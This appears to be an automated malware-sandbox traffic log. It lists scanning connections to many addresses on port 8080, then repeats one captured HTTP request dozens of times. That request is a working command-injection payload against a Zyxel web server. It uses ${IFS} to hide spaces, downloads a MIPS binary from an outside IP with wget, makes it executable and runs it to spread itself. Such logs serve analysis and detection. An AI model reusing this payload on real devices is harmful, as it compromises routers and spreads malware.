            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 103.166.225.87:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 97.73.103.45:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 5.145.58.96:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 40.141.28.115:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 150.196.245.191:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 171.2.43.167:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 80.81.161.181:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 209.90.255.35:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 217.30.104.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 157.164.237.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 155.66.247.31:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 222.111.115.4:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 98.30.139.28:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 218.188.167.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 223.14.65.129:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 12.34.22.69:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 101.38.236.33:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 160.154.245.206:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 222.123.47.113:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 178.160.174.148:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 54.231.158.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 103.72.1.134:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 65.43.24.212:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 97.169.199.116:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 25.207.144.215:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 115.107.218.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 80.9.251.43:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 153.16.25.199:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 49.72.2.89:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 31.217.71.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 129.184.60.87:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 97.129.165.88:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 102.247.212.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 40.81.69.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 157.152.156.21:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 219.219.232.53:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 147.129.205.138:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 148.170.95.50:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 212.157.93.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 140.0.49.18:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 52.93.193.72:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 139.179.139.121:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 161.173.196.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 212.254.245.135:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 138.89.13.237:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 128.169.214.42:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 157.138.68.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 106.50.243.13:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 155.246.196.186:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 86.83.122.14:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 223.12.117.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 80.225.171.199:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 87.237.208.251:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 132.251.46.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 93.86.167.31:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 198.106.188.242:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 19.40.154.119:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 9.106.64.77:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 18.165.120.8:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 197.94.241.118:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 70.10.117.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 116.60.92.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 67.37.131.154:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 17.249.236.111:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 156.235.91.186:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 63.189.31.39:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 66.126.92.107:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 69.24.109.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 168.137.159.16:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 174.38.68.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 217.152.69.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 27.250.63.144:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 70.18.189.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 135.27.178.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 108.166.49.44:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 91.125.92.143:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 145.113.205.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 61.142.101.203:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 12.218.53.248:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 14.151.157.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 157.60.182.133:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 219.110.157.231:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 32.160.157.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 140.19.243.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 27.94.243.148:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 37.198.89.106:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 200.77.207.27:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 37.27.154.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 102.6.59.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 193.235.192.12:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 203.76.103.120:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 108.168.4.197:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 98.8.101.141:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 166.223.94.101:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 126.31.110.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 151.239.187.95:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 82.235.232.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 149.144.25.227:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 199.102.106.210:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 65.88.25.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 62.139.117.220:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 221.244.53.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 144.158.158.234:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 62.66.54.28:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 18.8.215.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 176.232.4.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 91.138.20.92:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 138.48.223.249:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 124.115.132.177:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 222.15.107.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 67.239.167.31:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 198.72.50.181:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
